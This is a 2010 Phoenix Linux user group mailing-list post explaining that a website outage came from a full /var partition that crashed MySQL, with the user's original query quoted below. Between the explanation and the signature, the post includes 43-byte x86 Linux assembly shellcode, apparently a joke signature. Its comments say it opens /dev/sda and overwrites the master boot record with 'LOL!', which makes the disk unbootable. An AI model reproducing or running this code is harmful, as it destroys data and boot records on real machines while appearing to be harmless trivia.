Wow, after all the wild speculation on what was going on with the server, here's what actually happened:
The hard drive on the server has a rather unfortunate partition layout and the /var directory is rather small and was simply filled up, so mysql freaked out and quit.... that's all, and it's all fixed now.
A new server will to be swapped in rather soon, and we'll make sure that it doesn't have the same stupid partitioning on it, and we will be going to a new website at the same time.
; linux/x86 overwrite MBR on /dev/sda with `LOL!' 43 bytes
; root@thegibson |
; 2010-01-15 |
section .text |
global _start |
_start: |
; open("/dev/sda", O_WRONLY); |
mov al, 5 |
xor ecx, ecx |
push ecx |
push dword 0x6164732f |
push dword 0x7665642f |
mov ebx, esp |
inc ecx |
int 0x80 |
; write(fd, "LOL!"x128, 512); |
mov ebx, eax |
mov al, 4 |
cdq |
push edx |
mov cl, 128 |
fill: |
push dword 0x214c4f4c |
loop fill |
mov ecx, esp |
inc edx |
shl edx, 9 |
int 0x80
Brian Cluff
On 10/29/2010 08:53 AM, Jordan Aberle wrote:
I have tried to visit the website last night as well as this morning but
there seems to be a database problem. It is saying 'mysql: too many
connections' but I tried accessing the website early this morning - I
doubt it was getting bombarded by millions of plug members. :)
Any eta?
Thanks,
Jordan
---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss